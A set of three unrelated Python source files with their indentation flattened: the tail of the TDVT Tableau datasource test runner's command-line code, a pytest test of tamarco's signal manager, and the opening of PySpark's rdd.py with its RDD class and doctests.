current_test_set = current_test_set[0]
if not current_test_set:
current_test_set = FileTestSet(suite_name, test_root_dir, test_set_unique_id, tds, tdvt_invocation.logical, suite_name,
password_file, expected_message)
if tdvt_invocation.logical:
test_set_config.add_logical_testset(current_test_set)
else:
test_set_config.add_expression_testset(current_test_set)
current_test_set.append_test_file(test_file_path)
for suite_names in all_test_configs:
for test_set_id in all_test_configs[suite_names]:
test_set_config = all_test_configs[suite_names][test_set_id]
for each_test_set in test_set_config.get_logical_tests() + test_set_config.get_expression_tests():
tdvt_invocation = all_tdvt_test_configs[test_set_id]
all_test_pairs.append((each_test_set, tdvt_invocation))
logging.debug("Queuing up tests: " + str(tdvt_invocation))
return all_test_pairs
def enqueue_tests(ds_info, args, suite):
tests = []
test_set_configs = []
if not is_test(args):
return test_set_configs
logging.debug("Enqueing tests for " + ds_info.dsname)
if args.logical_only or args.expression_only:
if args.logical_only:
tests.extend(ds_info.get_logical_tests(args.logical_only))
if args.expression_only:
tests.extend(ds_info.get_expression_tests(args.expression_only))
else:
tests.extend(ds_info.get_logical_tests(args.logical_only))
tests.extend(ds_info.get_expression_tests(args.expression_only))
# Make sure there are tests.
if not tests:
logging.error("No tests found")
return test_set_configs
for x in tests:
if not x.generate_test_file_list():
logging.error("No tests found for config " + str(x))
return test_set_configs
for test_set in tests:
tdvt_invocation = TdvtInvocation(from_args=args, test_config = ds_info)
tdvt_invocation.logical = test_set.is_logical_test()
tdvt_invocation.tds = test_set.tds_name
tdvt_invocation.config_file = test_set.config_name
test_set_configs.append((test_set, tdvt_invocation))
return test_set_configs
def get_level_of_parallelization(args):
# This indicates how many database/test suite combinations to run at once
max_threads = 6
if is_test(args) and args.thread_count:
max_threads = args.thread_count
max_threads = get_max_process_level_of_parallelization(max_threads)
print("Setting tdvt thread count to: " + str(max_threads))
return max_threads
list_usage_text = '''
Show all test suites or list the contents of a specific suite.
'''
list_logical_usage_text = '''
Show logical configs. The argument can be empty to list all, or you can specify a config by name.
'''
run_usage_text = '''
The 'run' argument can take a single datasource, a list of data sources, or a test suite name in any combination.
run postgres_odbc,postgres_jdbc
The 'run' argument can also take the --verify flag to run a connection test against tests with SmokeTest = True set.
run postgres_odbc --verify
Both logical and expression tests are run by default.
Run all expression tests
run postgres_odbc -e
Run all logical tests
run postgres_odbc -q
There are multiple suites of expression tests, for example, standard and LOD (level of detail). The config files that drive the tests
are named expression_test.sqlserver.cfg and expression.lod.sqlserver.cfg.
To run just one of those try entering part of the config name as an argument:
run postgres_odbc -e lod
'''
run_pattern_usage_text = '''
Run one expression test against many datasources
run-pattern postgres_odbc --exp exprtests/standard/setup.date.datepart.second*.txt --tdp cast_calcs.*.tds
Run one logical query test against many datasources
run-pattern postgres_odbc --logp logicaltests/setup/calcs/setup.BUGS.B1713.?.xml --tdp cast_calcs.*.tds
The 'exp' argument is a glob pattern that is used to find the test file using the relative test path.
The 'test-ex' argument can be used to exclude test files. This is a regular expression pattern.
The tds pattern is used to find the tds. Use a '*' character where the tds name will be substituted,
i.e. cast_calcs.*.tds
This can be combined with * to run an arbitrary set of 'correct' logical query tests against a datasource
run-pattern postgres_odbc --logp logicaltests/setup/calcs/setup.BUGS.*.?.xml --tdp cast_calcs.*.tds
Alternatively
run-pattern postgres_odbc --logp logicaltests/setup/calcs/setup.BUGS.*.dbo.xml --tdp cast_calcs.*.tds
But skip 59740?
run-pattern postgres_odbc --logp logicaltests/setup/calcs/setup.BUGS.*.dbo.xml --tdp cast_calcs.*.tds --test-ex 59740
'''
action_usage_text = '''
'''
run_file_usage_text = '''
'''
def create_parser():
parser = argparse.ArgumentParser(description='TDVT - Tableau Datasource Verification Tool.')
parser.add_argument('--verbose', dest='verbose', action='store_true', help='Verbose output.', required=False)
#Common run test options.
run_test_common_parser = argparse.ArgumentParser(description='Common test run options.', add_help=False)
run_test_common_parser.add_argument('--threads', '-t', dest='thread_count', type=int, help='Max number of threads to use.', required=False)
run_test_common_parser.add_argument('--no-clean', dest='noclean', action='store_true', help='Leave temp dirs.', required=False)
run_test_common_parser.add_argument('--generate', dest='generate', action='store_true', help='Generate logical query test files.', required=False)
run_test_common_parser.add_argument('--compare-sql', dest='compare_sql', action='store_true', help='Compare SQL.', required=False)
run_test_common_parser.add_argument('--nocompare-tuples', dest='nocompare_tuples', action='store_true', help='Do not compare Tuples.', required=False)
run_test_common_parser.add_argument('--compare-error', dest='compare_error', action='store_true', help='Compare error.', required=False)
subparsers = parser.add_subparsers(help='commands', dest='command')
#Get information.
list_parser = subparsers.add_parser('list', help='List information about datasource tests and suites.', usage=list_usage_text)
list_parser.add_argument(dest='list_ds', help='List datasource config.', default='', nargs='?')
list_logical_parser = subparsers.add_parser('list-logical-configs', help='List information about logical configurations.', usage=list_logical_usage_text)
list_logical_parser.add_argument(dest='list_logical_configs', help='List available logical configs.', default='', nargs='?')
#Actions.
action_group = subparsers.add_parser('action', help='Various non-test actions.', usage=action_usage_text)
action_group.add_argument('--setup', dest='setup', action='store_true', help='Create setup directory structure.', required=False)
action_group.add_argument('--add_ds', dest='add_ds', help='Add a new datasource.', required=False)
action_group.add_argument('--diff-test', '-dd', dest='diff', help='Diff the results of the given test (ie exprtests/standard/setup.calcs_data.txt) against the expected files. Can be used with the sql and tuple options.', required=False)
action_group.add_argument('--generate', dest='action_generate', action='store_true', help='Generate logical query test files.', required=False)
#Run tests.
run_test_parser = subparsers.add_parser('run', help='Run tests.', parents=[run_test_common_parser], usage=run_usage_text)
run_test_parser.add_argument('ds', help='Comma separated list of Datasource names or groups to test. See the \'list\' command.', nargs='+')
run_test_parser.add_argument('--verify', dest='smoke_test', action='store_true', help='Verifies the connection to a data source against tests in your .ini file with SmokeTest = True.', required=False) # noqa: E501
run_test_parser.add_argument('--force-run', dest='force_run', action='store_true', help='Attempts to run the tests for a data source, even if its smoke tests fail.')
run_test_parser.add_argument('--logical', '-q', dest='logical_only', help='Only run logical tests whose config file name matches the supplied string, or all if blank.', required=False, default=None, const='*', nargs='?')
run_test_parser.add_argument('--expression', '-e', dest='expression_only', help='Only run expression tests whose config file name matches the supplied string, or all if blank.', required=False, default=None, const='*', nargs='?')
#Run test pattern.
run_test_pattern_parser = subparsers.add_parser('run-pattern', help='Run individual tests using a pattern.', parents=[run_test_common_parser], usage=run_pattern_usage_text)
run_test_pattern_parser.add_argument('ds', help='Comma separated list of Datasource names or groups to test. See the \'list\' command.', nargs='+')
run_test_group = run_test_pattern_parser.add_mutually_exclusive_group(required=True)
run_test_group.add_argument('--exp', dest='expression_pattern', help='Only run expression tests whose name and path match the supplied string. This is a glob pattern. Also you must set the tds-pattern to use when running the test.', required=False, default=None, const='', nargs='?')
run_test_group.add_argument('--logp', dest='logical_pattern', help='Only run logical tests whose name and path match the supplied string. This is a glob pattern. Also you must set the tds-pattern to use when running the test. Use a ? to replace the logical query config component of the test name.', required=False, default=None, const='', nargs='?')
run_test_pattern_parser.add_argument('--tdp', dest='tds_pattern', help='The datasource tds pattern to use when running the test. See exp and logp arguments.', required=True, default=None, const='', nargs='?')
run_test_pattern_parser.add_argument('--test-ex', dest='test_pattern_exclude', help='Exclude tests whose name matches the supplied string. This is a regular expression pattern. Can be used with exp and logp arguments. Also set the tds-pattern to use when running the test.', required=False, default=None, const='', nargs='?')
#Run file.
run_file_parser = subparsers.add_parser('run-file', help='Run tests from a file.', parents=[run_test_common_parser], usage=run_file_usage_text)
run_file_parser.add_argument('run_file', help='Json file containing failed tests to run.')
return parser
def init():
parser = create_parser()
args = parser.parse_args()
# Create logger.
logging.basicConfig(filename='tdvt_log_combined.txt', level=logging.DEBUG, filemode='w',
format='%(asctime)s %(message)s')
logger = logging.getLogger()
ch = logging.StreamHandler()
if 'verbose' in args and args.verbose:
# Log to console also.
ch.setLevel(logging.DEBUG)
else:
args.verbose = False
ch.setLevel(logging.WARNING)
logger.addHandler(ch)
logging.debug('TDVT version: ' + str(__version__))
logging.debug('TDVT Arguments: ' + str(args))
ds_reg = get_datasource_registry(sys.platform)
configure_tabquery_path()
return parser, ds_reg, args
def is_test(args):
return args.command in ['run', 'run-pattern', 'run-file']
def active_thread_count(threads):
active = 0
for t in threads:
if t.is_alive():
active += 1
return active
def test_runner(all_tests, test_queue, max_threads):
for i in range(0, max_threads):
worker = threading.Thread(target=do_test_queue_work, args=(i, test_queue))
worker.setDaemon(True)
worker.start()
test_queue.join()
failed_tests = 0
skipped_tests = 0
disabled_tests = 0
total_tests = 0
for work in all_tests:
if work.copy_files_and_cleanup():
print("Left temp dir: " + work.temp_dir)
failed_tests += work.failed_tests if work.failed_tests else 0
skipped_tests += work.skipped_tests if work.skipped_tests else 0
disabled_tests += work.disabled_tests if work.disabled_tests else 0
total_tests += work.total_tests if work.total_tests else 0
return failed_tests, skipped_tests, disabled_tests, total_tests
def run_tests_impl(tests: List[Tuple[TestSet, TestConfig]], max_threads: int, args) -> Optional[Tuple[int, int, int, int]]:
if not tests:
print("No tests found. Check arguments.")
sys.exit()
smoke_test_queue = queue.Queue()
smoke_tests = []
test_queue = queue.Queue()
all_work = []
lock = threading.Lock()
for test_set, test_config in tests:
runner = TestRunner(test_set, test_config, lock, args.verbose, len(all_work) + 1)
if test_set.smoke_test:
smoke_tests.append(runner)
smoke_test_queue.put(runner)
else:
all_work.append(runner)
logging.debug("smoke test queue size is: " + str(len(smoke_tests)))
logging.debug("test queue size is: " + str(len(all_work)))
require_smoke_test = args.command == 'run' and args.smoke_test
force_run = args.command == 'run' and args.force_run
if not smoke_tests:
logging.warning("No smoke tests detected.")
if require_smoke_test:
sys.exit(1)
else:
logging.warning("Tests will run without verifying the data source connection.")
if not all_work and not smoke_tests:
print("No tests found. Check arguments.")
sys.exit()
failing_ds = set()
failed_smoke_tests = 0
skipped_smoke_tests = 0
disabled_smoke_tests = 0
total_smoke_tests = 0
smoke_tests_run = 0
absolute_start_time = time.time()
smoke_test_run_time = 0
if smoke_tests:
smoke_test_threads = min(len(smoke_tests), max_threads)
print("Starting smoke tests. Creating", str(smoke_test_threads), "worker threads.\n")
failed_smoke_tests, skipped_smoke_tests, disabled_smoke_tests, total_smoke_tests = test_runner(
smoke_tests, smoke_test_queue, smoke_test_threads)
smoke_tests_run = total_smoke_tests - disabled_smoke_tests
print("{} smoke test(s) ran. {} smoke tests disabled.".format(smoke_tests_run, disabled_smoke_tests))
smoke_test_run_time = round(time.time() - absolute_start_time, 2)
print("Smoke tests ran in {} seconds.".format(smoke_test_run_time))
if failed_smoke_tests > 0:
print("{} smoke test(s) failed. Please check logs for information.".format(failed_smoke_tests))
failing_ds = set(item.test_set.ds_name for item in smoke_tests if item.failed_tests > 0)
if require_smoke_test:
print("\nSmoke tests failed, exiting.")
sys.exit(1)
if require_smoke_test:
print("\nSmoke tests finished. Exiting.")
sys.exit(0)
if failing_ds and not force_run:
print("Tests for the following data source(s) will not be run: {}".format(', '.join(failing_ds)))
final_work = []
for item in all_work:
if not force_run:
if item.test_set.ds_name in failing_ds:
item.test_set.test_is_skipped = True
final_work.append(item)
test_queue.put(item)
print("\nStarting tests. Creating " + str(max_threads) + " worker threads.")
start_time = time.time()
failed_tests, skipped_tests, disabled_tests, total_tests = test_runner(final_work, test_queue, max_threads)
failed_tests += failed_smoke_tests
skipped_tests += skipped_smoke_tests
disabled_tests += disabled_smoke_tests
total_tests += total_smoke_tests
total_tests_run = total_tests - disabled_tests - skipped_tests
total_passed_tests = total_tests_run - failed_tests
now_time = time.time()
main_test_time = round(now_time - start_time, 2)
total_run_time = round(now_time - absolute_start_time, 2)
print('\nTest Count: {} tests'.format(total_tests))
print("\tPassed tests: {}".format(total_passed_tests))
print("\tFailed tests: " + str(failed_tests))
print("\tTests run: " + str(total_tests_run))
print("\tDisabled tests: " + str(disabled_tests))
print("\tSkipped tests: " + str(skipped_tests))
print("\nOther information:")
print("\tSmoke test time: {} seconds".format(smoke_test_run_time))
print("\tMain test time: {} seconds".format(main_test_time))
print("\tTotal time: {} seconds".format(total_run_time))
return failed_tests, skipped_tests, disabled_tests, total_tests
def get_ds_list(ds):
if not ds:
return []
ds_list = ds[0].split(',')
ds_list = [x.strip() for x in ds_list]
return ds_list
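# Example (illustrative, matching the 'run' usage text above):
#     get_ds_list(['postgres_odbc,postgres_jdbc']) -> ['postgres_odbc', 'postgres_jdbc']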
def run_desired_tests(args, ds_registry):
generate_files(ds_registry, False)
ds_to_run = ds_registry.get_datasources(get_ds_list(args.ds))
if not ds_to_run:
sys.exit(0)
if len(ds_to_run) > 0:
delete_output_files(os.getcwd())
if not tabquerycli_exists():
print("Could not find Tabquerycli.")
sys.exit(0)
max_threads = get_level_of_parallelization(args)
test_sets: List[TestSet] = []
for ds in ds_to_run:
ds_info = ds_registry.get_datasource_info(ds)
if not ds_info:
continue
print("Testing " + ds)
max_threads_per_datasource = ds_info.run_time_config.maxthread
# If multiple datasources are being run, max_threads_per_datasource cannot apply.
if max_threads_per_datasource > 0:
print("thread setting in " + ds + ".ini = " + str(max_threads_per_datasource))
if len(ds_to_run) == 1:
max_threads = max_threads_per_datasource
else:
print("Setting cannot apply since you are running multiple datasources.")
suite = ds
if args.command == 'run-pattern':
single_test, single_test_config = enqueue_single_test(args, ds_info, suite)
if single_test:
test_sets.extend([(single_test, single_test_config)])
else:
test_sets.extend(enqueue_tests(ds_info, args, suite))
failed_tests, skipped_tests, disabled_tests, total_tests = run_tests_impl(test_sets, max_threads, args)
return failed_tests
def run_file(run_file: Path, output_dir: Path, threads: int, args) -> int:
"""Rerun all the failed tests listed in the json file."""
logging.debug("Running failed tests from : " + str(run_file))
# See if we need to generate test setup files.
root_directory = get_root_dir()
failed_tests, skipped_tests, disabled_tests, total_tests = \
run_tests_impl(enqueue_failed_tests(run_file, root_directory, args), threads, args)
# This can be a retry-step.
return 0
def run_generate(ds_registry):
start_time = time.time()
generate_files(ds_registry, True)
end_time = time.time() - start_time
print("Done: " + str(end_time))
def main():
parser, ds_registry, args = init()
if args.command == 'action':
if args.setup:
print("Creating setup files...")
create_test_environment()
sys.exit(0)
elif args.add_ds:
add_datasource(args.add_ds, ds_registry)
generate_files(ds_registry, True)
sys.exit(0)
elif args.action_generate:
run_generate(ds_registry)
sys.exit(0)
elif is_test(args):
if args.generate:
run_generate(ds_registry)
# It's ok to call generate and then run some tests, so don't exit here.
if args.command == 'run-file':
output_dir = os.getcwd()
max_threads = get_level_of_parallelization(args)
sys.exit(run_file(Path(args.run_file), Path(output_dir), max_threads, args))
error_code = run_desired_tests(args, ds_registry)
sys.exit(error_code)
elif args.command == 'action' and args.diff:
tdvt_invocation = TdvtInvocation(from_args=args)
run_diff(tdvt_invocation, args.diff)
sys.exit(0)
elif args.command == 'list-logical-configs':
print_logical_configurations(ds_registry, args.list_logical_configs)
sys.exit(0)
elif args.command == 'list':
print_configurations(ds_registry, [args.list_ds], args.verbose)
sys.exit(0)
logging.error("Could not interpret arguments. Nothing done.")
parser.print_help()
sys.exit(-1)
if __name__ == '__main__':
main()
|
test_signals.py
|
import asyncio
import signal
import threading
from time import sleep
from unittest import mock
import pytest
from tamarco.core.signals import SignalsManager, signal_handler
@pytest.mark.asyncio
async def test_signal_manager(event_loop):
signals_manager = SignalsManager()
signals_manager.set_loop(event_loop)
flag1 = False
flag2 = False
def sigalrm_handler(signum, frame):
nonlocal flag1
flag1 = True
async def sigint_handler(signum, frame):
nonlocal flag2
flag2 = True
def exception_handler(signum, frame):
raise Exception
signals_manager.register_signal(sigalrm_handler, signal.SIGALRM)
signals_manager.register_signal(sigint_handler, signal.SIGALRM)
signals_manager.register_signal(exception_handler, signal.SIGQUIT)
assert sigalrm_handler == signals_manager.handlers[signal.SIGALRM][0]
assert sigint_handler == signals_manager.handlers[signal.SIGALRM][1]
assert exception_handler == signals_manager.handlers[signal.SIGQUIT][0]
def use_alarm():
signal.alarm(1)
alarm_thread = threading.Thread(target=use_alarm, name="alarm_thread")
alarm_thread.start()
sleep(1.1)
alarm_thread.join()
assert flag1
# Allow asyncio to execute queued tasks, in this case the asynchronous signal handler
await asyncio.sleep(0)
await asyncio.sleep(0)
assert flag2
with mock.patch("tamarco.core.signals.logger") as mock_logger:
signals_manager._dispatch_signal(signal.SIGQUIT, None)
assert mock_logger.warning.called
def test_signal_handler():
@signal_handler(signal.SIGALRM)
def handler():
pass
assert handler in SignalsManager().handlers[signal.SIGALRM]
|
rdd.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import copy
import sys
import os
import re
import operator
import shlex
import warnings
import heapq
import bisect
import random
from subprocess import Popen, PIPE
from tempfile import NamedTemporaryFile
from threading import Thread
from collections import defaultdict
from itertools import chain
from functools import reduce
from math import sqrt, log, isinf, isnan, pow, ceil
if sys.version > '3':
basestring = unicode = str
else:
from itertools import imap as map, ifilter as filter
from pyspark.java_gateway import local_connect_and_auth
from pyspark.serializers import AutoBatchedSerializer, BatchedSerializer, NoOpSerializer, \
CartesianDeserializer, CloudPickleSerializer, PairDeserializer, PickleSerializer, \
UTF8Deserializer, pack_long, read_int, write_int
from pyspark.join import python_join, python_left_outer_join, \
python_right_outer_join, python_full_outer_join, python_cogroup
from pyspark.statcounter import StatCounter
from pyspark.rddsampler import RDDSampler, RDDRangeSampler, RDDStratifiedSampler
from pyspark.storagelevel import StorageLevel
from pyspark.resultiterable import ResultIterable
from pyspark.shuffle import Aggregator, ExternalMerger, \
get_used_memory, ExternalSorter, ExternalGroupBy
from pyspark.traceback_utils import SCCallSiteSync
from pyspark.util import fail_on_stopiteration
__all__ = ["RDD"]
class PythonEvalType(object):
"""
Evaluation type of python rdd.
These values are internal to PySpark.
These values should match values in org.apache.spark.api.python.PythonEvalType.
"""
NON_UDF = 0
SQL_BATCHED_UDF = 100
SQL_SCALAR_PANDAS_UDF = 200
SQL_GROUPED_MAP_PANDAS_UDF = 201
SQL_GROUPED_AGG_PANDAS_UDF = 202
SQL_WINDOW_AGG_PANDAS_UDF = 203
def portable_hash(x):
"""
This function returns a consistent hash code for builtin types, especially
for None and tuples containing None.
The algorithm is similar to the one used by CPython 2.7.
>>> portable_hash(None)
0
>>> portable_hash((None, 1)) & 0xffffffff
219750521
"""
if sys.version_info >= (3, 2, 3) and 'PYTHONHASHSEED' not in os.environ:
raise Exception("Randomness of hash of string should be disabled via PYTHONHASHSEED")
if x is None:
return 0
if isinstance(x, tuple):
h = 0x345678
for i in x:
h ^= portable_hash(i)
h *= 1000003
h &= sys.maxsize
h ^= len(x)
if h == -1:
h = -2
return int(h)
return hash(x)
class BoundedFloat(float):
"""
A bounded value generated by an approximate job, with a confidence level and
low and high bounds.
>>> BoundedFloat(100.0, 0.95, 95.0, 105.0)
100.0
"""
def __new__(cls, mean, confidence, low, high):
obj = float.__new__(cls, mean)
obj.confidence = confidence
obj.low = low
obj.high = high
return obj
def _parse_memory(s):
"""
Parse a memory string in the format supported by Java (e.g. 1g, 200m) and
return the value in MiB
>>> _parse_memory("256m")
256
>>> _parse_memory("2g")
2048
"""
units = {'g': 1024, 'm': 1, 't': 1 << 20, 'k': 1.0 / 1024}
if s[-1].lower() not in units:
raise ValueError("invalid format: " + s)
return int(float(s[:-1]) * units[s[-1].lower()])
def _create_local_socket(sock_info):
(sockfile, sock) = local_connect_and_auth(*sock_info)
# The RDD materialization time is unpredictable; if we set a timeout for the socket read
# operation, it will very likely fail. See SPARK-18281.
sock.settimeout(None)
return sockfile
def _load_from_socket(sock_info, serializer):
sockfile = _create_local_socket(sock_info)
# The socket will be automatically closed when garbage-collected.
return serializer.load_stream(sockfile)
def _local_iterator_from_socket(sock_info, serializer):
class PyLocalIterable(object):
""" Create a synchronous local iterable over a socket """
def __init__(self, _sock_info, _serializer):
self._sockfile = _create_local_socket(_sock_info)
self._serializer = _serializer
self._read_iter = iter([]) # Initialize as empty iterator
self._read_status = 1
def __iter__(self):
while self._read_status == 1:
# Request next partition data from Java
write_int(1, self._sockfile)
self._sockfile.flush()
# If response is 1 then there is a partition to read, if 0 then fully consumed
self._read_status = read_int(self._sockfile)
if self._read_status == 1:
# Load the partition data as a stream and read each item
self._read_iter = self._serializer.load_stream(self._sockfile)
for item in self._read_iter:
yield item
# An error occurred, read error message and raise it
elif self._read_status == -1:
error_msg = UTF8Deserializer().loads(self._sockfile)
raise RuntimeError("An error occurred while reading the next element from "
"toLocalIterator: {}".format(error_msg))
def __del__(self):
# If local iterator is not fully consumed,
if self._read_status == 1:
try:
# Finish consuming partition data stream
for _ in self._read_iter:
pass
# Tell Java to stop sending data and close connection
write_int(0, self._sockfile)
self._sockfile.flush()
except Exception:
# Ignore any errors, socket is automatically closed when garbage-collected
pass
return iter(PyLocalIterable(sock_info, serializer))
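# Protocol summary (derived from the class above): the Python side writes 1 to request the next
# partition and 0 to stop; the Java side answers 1 (partition data follows), 0 (fully consumed)
# or -1 (an error message follows).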
def ignore_unicode_prefix(f):
"""
Ignore the 'u' prefix of strings in doctests, to make them work
in both Python 2 and 3.
"""
if sys.version >= '3':
# the representation of unicode string in Python 3 does not have prefix 'u',
# so remove the prefix 'u' for doc tests
literal_re = re.compile(r"(\W|^)[uU](['])", re.UNICODE)
f.__doc__ = literal_re.sub(r'\1\2', f.__doc__)
return f
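# Illustrative effect (example only): a doctest expectation such as
#     [u'1', u'2', u'', u'3']
# in a decorated function's docstring is rewritten to
#     ['1', '2', '', '3']
# so the same doctest passes under Python 3, where repr() has no 'u' prefix.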
class Partitioner(object):
def __init__(self, numPartitions, partitionFunc):
self.numPartitions = numPartitions
self.partitionFunc = partitionFunc
def __eq__(self, other):
return (isinstance(other, Partitioner) and self.numPartitions == other.numPartitions
and self.partitionFunc == other.partitionFunc)
def __call__(self, k):
return self.partitionFunc(k) % self.numPartitions
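# Minimal usage sketch (illustrative): a Partitioner built with portable_hash maps a key to a
# partition index in [0, numPartitions):
#     p = Partitioner(2, portable_hash)
#     p("some_key")  # -> 0 or 1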
class RDD(object):
"""
A Resilient Distributed Dataset (RDD), the basic abstraction in Spark.
Represents an immutable, partitioned collection of elements that can be
operated on in parallel.
"""
def __init__(self, jrdd, ctx, jrdd_deserializer=AutoBatchedSerializer(PickleSerializer())):
self._jrdd = jrdd
self.is_cached = False
self.is_checkpointed = False
self.ctx = ctx
self._jrdd_deserializer = jrdd_deserializer
self._id = jrdd.id()
self.partitioner = None
def _pickled(self):
return self._reserialize(AutoBatchedSerializer(PickleSerializer()))
def id(self):
"""
A unique ID for this RDD (within its SparkContext).
"""
return self._id
def __repr__(self):
return self._jrdd.toString()
def __getnewargs__(self):
# This method is called when attempting to pickle an RDD, which is always an error:
raise Exception(
"It appears that you are attempting to broadcast an RDD or reference an RDD from an "
"action or transformation. RDD transformations and actions can only be invoked by the "
"driver, not inside of other transformations; for example, "
"rdd1.map(lambda x: rdd2.values.count() * x) is invalid because the values "
"transformation and count action cannot be performed inside of the rdd1.map "
"transformation. For more information, see SPARK-5063."
)
@property
def context(self):
"""
The L{SparkContext} that this RDD was created on.
"""
return self.ctx
def cache(self):
"""
Persist this RDD with the default storage level (C{MEMORY_ONLY}).
"""
self.is_cached = True
self.persist(StorageLevel.MEMORY_ONLY)
return self
def persist(self, storageLevel=StorageLevel.MEMORY_ONLY):
"""
Set this RDD's storage level to persist its values across operations
after the first time it is computed. This can only be used to assign
a new storage level if the RDD does not have a storage level set yet.
If no storage level is specified defaults to (C{MEMORY_ONLY}).
>>> rdd = sc.parallelize(["b", "a", "c"])
>>> rdd.persist().is_cached
True
"""
self.is_cached = True
javaStorageLevel = self.ctx._getJavaStorageLevel(storageLevel)
self._jrdd.persist(javaStorageLevel)
return self
def unpersist(self, blocking=False):
"""
Mark the RDD as non-persistent, and remove all blocks for it from
memory and disk.
.. versionchanged:: 3.0.0
Added optional argument `blocking` to specify whether to block until all
blocks are deleted.
"""
self.is_cached = False
self._jrdd.unpersist(blocking)
return self
def checkpoint(self):
"""
Mark this RDD for checkpointing. It will be saved to a file inside the
checkpoint directory set with L{SparkContext.setCheckpointDir()} and
all references to its parent RDDs will be removed. This function must
be called before any job has been executed on this RDD. It is strongly
recommended that this RDD is persisted in memory, otherwise saving it
on a file will require recomputation.
"""
self.is_checkpointed = True
self._jrdd.rdd().checkpoint()
def isCheckpointed(self):
"""
Return whether this RDD is checkpointed and materialized, either reliably or locally.
"""
return self._jrdd.rdd().isCheckpointed()
def localCheckpoint(self):
"""
Mark this RDD for local checkpointing using Spark's existing caching layer.
This method is for users who wish to truncate RDD lineages while skipping the expensive
step of replicating the materialized data in a reliable distributed file system. This is
useful for RDDs with long lineages that need to be truncated periodically (e.g. GraphX).
Local checkpointing sacrifices fault-tolerance for performance. In particular, checkpointed
data is written to ephemeral local storage in the executors instead of to a reliable,
fault-tolerant storage. The effect is that if an executor fails during the computation,
the checkpointed data may no longer be accessible, causing an irrecoverable job failure.
This is NOT safe to use with dynamic allocation, which removes executors along
with their cached blocks. If you must use both features, you are advised to set
L{spark.dynamicAllocation.cachedExecutorIdleTimeout} to a high value.
The checkpoint directory set through L{SparkContext.setCheckpointDir()} is not used.
"""
self._jrdd.rdd().localCheckpoint()
def isLocallyCheckpointed(self):
"""
Return whether this RDD is marked for local checkpointing.
Exposed for testing.
"""
return self._jrdd.rdd().isLocallyCheckpointed()
def getCheckpointFile(self):
"""
Gets the name of the file to which this RDD was checkpointed
Not defined if RDD is checkpointed locally.
"""
checkpointFile = self._jrdd.rdd().getCheckpointFile()
if checkpointFile.isDefined():
return checkpointFile.get()
def map(self, f, preservesPartitioning=False):
"""
Return a new RDD by applying a function to each element of this RDD.
>>> rdd = sc.parallelize(["b", "a", "c"])
>>> sorted(rdd.map(lambda x: (x, 1)).collect())
[('a', 1), ('b', 1), ('c', 1)]
"""
def func(_, iterator):
return map(fail_on_stopiteration(f), iterator)
return self.mapPartitionsWithIndex(func, preservesPartitioning)
def flatMap(self, f, preservesPartitioning=False):
"""
Return a new RDD by first applying a function to all elements of this
RDD, and then flattening the results.
>>> rdd = sc.parallelize([2, 3, 4])
>>> sorted(rdd.flatMap(lambda x: range(1, x)).collect())
[1, 1, 1, 2, 2, 3]
>>> sorted(rdd.flatMap(lambda x: [(x, x), (x, x)]).collect())
[(2, 2), (2, 2), (3, 3), (3, 3), (4, 4), (4, 4)]
"""
def func(s, iterator):
return chain.from_iterable(map(fail_on_stopiteration(f), iterator))
return self.mapPartitionsWithIndex(func, preservesPartitioning)
def mapPartitions(self, f, preservesPartitioning=False):
"""
Return a new RDD by applying a function to each partition of this RDD.
>>> rdd = sc.parallelize([1, 2, 3, 4], 2)
>>> def f(iterator): yield sum(iterator)
>>> rdd.mapPartitions(f).collect()
[3, 7]
"""
def func(s, iterator):
return f(iterator)
return self.mapPartitionsWithIndex(func, preservesPartitioning)
def mapPartitionsWithIndex(self, f, preservesPartitioning=False):
"""
Return a new RDD by applying a function to each partition of this RDD,
while tracking the index of the original partition.
>>> rdd = sc.parallelize([1, 2, 3, 4], 4)
>>> def f(splitIndex, iterator): yield splitIndex
>>> rdd.mapPartitionsWithIndex(f).sum()
6
"""
return PipelinedRDD(self, f, preservesPartitioning)
def mapPartitionsWithSplit(self, f, preservesPartitioning=False):
"""
Deprecated: use mapPartitionsWithIndex instead.
Return a new RDD by applying a function to each partition of this RDD,
while tracking the index of the original partition.
>>> rdd = sc.parallelize([1, 2, 3, 4], 4)
>>> def f(splitIndex, iterator): yield splitIndex
>>> rdd.mapPartitionsWithSplit(f).sum()
6
"""
warnings.warn("mapPartitionsWithSplit is deprecated; "
"use mapPartitionsWithIndex instead", DeprecationWarning, stacklevel=2)
return self.mapPartitionsWithIndex(f, preservesPartitioning)
def getNumPartitions(self):
"""
Returns the number of partitions in RDD
>>> rdd = sc.parallelize([1, 2, 3, 4], 2)
>>> rdd.getNumPartitions()
2
"""
return self._jrdd.partitions().size()
def filter(self, f):
"""
Return a new RDD containing only the elements that satisfy a predicate.
>>> rdd = sc.parallelize([1, 2, 3, 4, 5])
>>> rdd.filter(lambda x: x % 2 == 0).collect()
[2, 4]
"""
def func(iterator):
return filter(fail_on_stopiteration(f), iterator)
return self.mapPartitions(func, True)
def distinct(self, numPartitions=None):
"""
Return a new RDD containing the distinct elements in this RDD.
>>> sorted(sc.parallelize([1, 1, 2, 3]).distinct().collect())
[1, 2, 3]
"""
return self.map(lambda x: (x, None)) \
.reduceByKey(lambda x, _: x, numPartitions) \
.map(lambda x: x[0])
def sample(self, withReplacement, fraction, seed=None):
"""
Return a sampled subset of this RDD.
:param withReplacement: can elements be sampled multiple times (replaced when sampled out)
:param fraction: expected size of the sample as a fraction of this RDD's size
without replacement: probability that each element is chosen; fraction must be [0, 1]
with replacement: expected number of times each element is chosen; fraction must be >= 0
:param seed: seed for the random number generator
.. note:: This is not guaranteed to provide exactly the fraction specified of the total
count of the given :class:`DataFrame`.
>>> rdd = sc.parallelize(range(100), 4)
>>> 6 <= rdd.sample(False, 0.1, 81).count() <= 14
True
"""
assert fraction >= 0.0, "Negative fraction value: %s" % fraction
return self.mapPartitionsWithIndex(RDDSampler(withReplacement, fraction, seed).func, True)
def randomSplit(self, weights, seed=None):
"""
Randomly splits this RDD with the provided weights.
:param weights: weights for splits, will be normalized if they don't sum to 1
:param seed: random seed
:return: split RDDs in a list
>>> rdd = sc.parallelize(range(500), 1)
